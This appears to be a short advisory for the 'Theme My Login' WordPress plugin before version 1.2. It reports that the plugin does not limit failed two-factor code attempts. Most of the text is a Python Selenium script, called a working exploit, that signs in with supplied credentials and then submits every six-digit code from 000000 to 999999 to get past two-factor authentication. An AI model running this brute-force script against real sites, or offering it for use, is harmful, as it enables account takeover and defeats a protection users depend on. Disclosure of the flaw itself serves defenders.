The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit: from typing import KeysView from selenium.webdriver.common.by import By from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox() driver.get("websiteloginhere") # Locate the username field by its 'id' attribute and fill it in username_field = driver.find_element(By.ID, "user_login") username_field.click() username_field.send_keys("usernamehere") # Locate the password field by its 'id' attribute and fill it in password_field = driver.find_element(By.ID, "user_pass") password_field.click() password_field.send_keys("passwordhere") # Locate the Log In button and click it login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") login_button.click() # FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting for i in range(1000000): code = str(i).zfill(6) try: wait = WebDriverWait(driver, 10) code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']"))) except: break code_field.click() code_field.clear() code_field.send_keys(code) verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") verify_button.click()